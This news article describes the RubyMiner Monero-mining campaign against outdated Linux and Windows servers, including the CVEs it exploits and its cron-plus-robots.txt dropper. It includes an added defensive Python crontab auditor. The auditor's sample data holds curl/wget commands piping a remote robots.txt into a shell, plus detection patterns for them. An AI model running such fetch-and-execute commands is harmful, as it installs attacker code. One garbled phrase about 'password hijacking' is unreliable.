RubyMiner malware hits vulnerable servers to mine cryptocurrencies
Security researchers recently observed RubyMiner, a new type of malware deployed online: a cryptocurrency miner found on forgotten web servers. According to findings released by Check Point and Certego, and information researchers received from Ixia, the attacks started last week, on January 9-10.
Attacks Linux and Windows servers
Ixia security researcher Stefan Tanase said RubyMiner targets both Windows and Linux systems. The team behind RubyMiner uses a web server fingerprinting tool called p0f to scan for and identify Linux and Windows servers running outdated software. Once unpatched servers are identified, the attackers exploit known vulnerabilities on those servers and then use RubyMiner to infect them.
Check Point and Ixia said they observed the attackers exploiting the following vulnerabilities in the recent wave of attacks:
◍ Ruby on Rails XML Processor YAML Deserialization Code Execution (CVE-2013-0156) [1]
◍ PHP php-cgi Query String Parameter Code Execution (CVE-2012-1823; CVE-2012-2311; CVE-2012-2335; CVE-2012-2336; CVE-2013-4878) [1, 2, 3, 4]
◍ Microsoft IIS ASP Scripts Source Code Disclosure (CVE-2005-2678) [1]
Attackers hide the malicious code in the robots.txt file
In a report released last week, Check Point explores the RubyMiner infection routine on Linux systems, based on data collected from honeypot servers, and notes the attackers' creativity in a few respects:
▨ The exploit code contains a series of shell commands
▨ Attackers clear all cron jobs
▨ Attackers add a new hourly cron job
▨ New cron job downloads a script hosted online
▨ This script is hosted inside the robots.txt file of various domains
▨ The script downloads and installs a modified version of the legitimate XMRig Monero miner application.
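The infection chain above leaves a distinctive footprint in the victim's crontab: a fresh hourly entry that downloads remote content, from a robots.txt URL, and pipes it into a shell. The following is an added example of a defender-side crontab audit for exactly that pattern; it is not code from the Check Point report or from RubyMiner. The crontab text, the `example.invalid` hostnames and the detection heuristics are all constructed for illustration.

```python
import re

# Constructed sample crontab (not data from the report). The last two lines
# mimic the described behaviour: an hourly job fetching robots.txt into a shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * /usr/bin/php /var/www/app/cron.php
0 * * * * curl -s http://example.invalid/robots.txt | bash
@hourly wget -q -O - hxxp://example.invalid/robots.txt | sh
"""

DOWNLOADER_RE = re.compile(r"\b(curl|wget|fetch)\b")
# hxxp is the defanged form commonly seen in shared indicators.
URL_RE = re.compile(r"(?:https?|hxxp)://\S+", re.IGNORECASE)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba|da|z|k)?sh\b")


def parse_crontab(text):
    """Split crontab text into (schedule, command) entries, skipping comments."""
    entries = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.startswith("@"):                      # @hourly, @daily, ...
            parts = s.split(None, 1)
            if len(parts) != 2:
                continue
            schedule, command = parts
        else:                                      # five time fields + command
            parts = s.split(None, 5)
            if len(parts) != 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command})
    return entries


def is_hourly(schedule):
    """True for '@hourly' or 'M * * * *' (a fixed minute, every hour)."""
    if schedule == "@hourly":
        return True
    fields = schedule.split()
    return len(fields) == 5 and fields[0].isdigit() and fields[1:] == ["*"] * 4


def assess_entry(entry):
    """Return the list of reasons an entry looks like the described dropper job."""
    cmd = entry["command"]
    reasons = []
    urls = URL_RE.findall(cmd)
    if DOWNLOADER_RE.search(cmd) and urls:
        reasons.append("downloads remote content")
        if any(u.rstrip("|;").lower().endswith("robots.txt") for u in urls):
            reasons.append("fetches a robots.txt URL (used to host the dropper script)")
    if PIPE_TO_SHELL_RE.search(cmd):
        reasons.append("pipes downloaded content into a shell")
    if reasons and is_hourly(entry["schedule"]):
        reasons.append("runs hourly")
    return reasons


def find_suspicious_cron_entries(text):
    """Audit a crontab and return every entry that matched at least one heuristic."""
    findings = []
    for entry in parse_crontab(text):
        reasons = assess_entry(entry)
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"{f['schedule']:<12} {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

On a live host the input would be the output of `crontab -l` for each user plus the files under `/etc/cron.d`; a job that both fetches a remote robots.txt and pipes it into a shell should never appear in a legitimate schedule, so those two reasons together are a high-confidence alert, while "downloads remote content" alone is only a lead worth reviewing.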
Lotem Finkelstein, a security researcher at Check Point, said the attackers are now also targeting Windows IIS servers, but Check Point has not yet obtained a copy of the Windows version of RubyMiner. In addition, Check Point said that a malware campaign in 2013 exploited the same Ruby on Rails vulnerability as RubyMiner, and speculated that the team behind that earlier activity is likely the one extending it with RubyMiner.
Monero mining malware is an increasingly evident trend
Overall, attempts to spread cryptocurrency-mining malware have increased in recent months, especially malware that mines Monero.
In addition to password hijacking events (also known as Monero), Monero mining malware families and botnets seen in 2017 include Digmine, an unnamed botnet targeting WordPress, Hexmen, Loapi, Zealot, WaterMiner, an unnamed botnet targeting IIS 6.0 servers, CodeFork and Bondnet. And in just the first two weeks of 2018, there have been PyCryptoMiner, which targets Linux servers, and another miner targeting Oracle WebLogic Server. In most incidents aimed at web servers, researchers found that attackers tried to exploit the most recent vulnerabilities, because more machines are still vulnerable to them. Oddly, the RubyMiner attackers use very old vulnerabilities, which most security software can detect.
According to researcher Finkelstein, the RubyMiner attackers may have deliberately looked for abandoned machines, such as forgotten PCs and servers running older operating systems, and infected those devices so that they could keep mining long-term under the security radar.
RubyMiner gangs have infected more than 700 servers
According to the wallet addresses found in the custom XMRig miners deployed by the RubyMiner malware, Check Point's initial statistics show around 700 RubyMiner-infected servers, with the attackers having earned about $540. Some experts believe the team behind the campaign could earn far more if it began using recent vulnerabilities. For example, a hacking group that began targeting Oracle WebLogic Server in October 2017 made a profit of $226,000.
Source: BleepingComputer